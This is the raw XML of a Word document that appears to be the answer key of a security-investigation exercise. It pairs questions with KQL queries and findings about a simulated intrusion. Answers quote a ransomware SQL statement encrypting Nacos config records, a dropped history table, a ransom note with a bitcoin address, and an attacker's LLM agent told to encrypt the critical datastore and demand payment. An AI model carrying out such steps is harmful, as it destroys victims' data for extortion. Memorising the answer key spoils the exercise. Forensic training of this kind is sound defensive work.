        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4DE4C888">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="609397"/>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93036" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId25"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="6093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8.00pt;height:47.98pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId25" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q4</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It queried the container runtime on ff-lf-01. Which containers did it see?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve"> GET /containers/json via /var/run/docker.sock, Cannot be established</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxContainer_CL, 19:35:32.754, src=langflow-rce, namespace=moby, service=dockerd. ContainerId, ImageName, ImageDigest, and ImageRef are empty for this event, and I confirmed they are empty for every event in the table, not just this one.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query 1:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1E33D1AC">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxContainer_CL</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p w14:paraId="5D2ACE79">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-lf-01"</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p w14:paraId="4E53901A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| where EventOriginalMessage has "docker.sock"</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p w14:paraId="1CA8AE33">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, EventOriginalMessage, Operation, ContainerId, ImageName, ImageDigest, ImageRef, Namespace, RuntimeService</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p w14:paraId="1E2E3770">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1E0EA242">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="694025"/>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727356" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId26"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="6940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68.00pt;height:54.65pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId26" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 6: Impact</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Establish what was done to the records and how much was touched.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE config_info SET content=AES_ENCRYPT(content,@k), 1342, config_info, history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Syslog, ff-db-01, mysqld query log, 19:36:30 through 19:36:39. The query log showed more than the agent's own narration: it also dropped history, Nacos's own change log, which the agent never mentioned.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6E09D530">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="23D3B5D3">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-db-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="4E138507">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:35:30Z) .. datetime(2026-07-30T19:37:30Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="6C5C8A03">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, ProcessName, SyslogMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1B9892C2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1882275"/>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25037" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId27"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="18822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8.00pt;height:148.21pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId27" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What did it leave for whoever finds this, and where does it want payment?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">readme_ransom, 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Same query result as Q1, the 19:36:39 through 19:36:44 rows.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6D246420">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2CDFA036">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-db-01"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="3640CFEF">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated between (datetime(2026-07-30T19:35:30Z) .. datetime(2026-07-30T19:37:30Z))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="1F623F0B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, ProcessName, SyslogMessage</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="77BC2F2B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="2361286"/>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51923" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId28"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="23612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68.00pt;height:185.93pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId28" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 7: Autonomy</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This estate runs its own LLM agent and its log is in scope. Identify the session that doesn't belong to the estate and the instruction that started it.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jp-7f3c9a21, Gain access to the Flowforge estate, locate and encrypt the most business-critical datastore, and leave payment instructions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLMAgentLogs_CL, user_input populated once at session start, 19:20:01.269. The legitimate estate agent, flowforge-assistant, runs a separate session (fa-5d1caf68) doing ordinary internal work.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
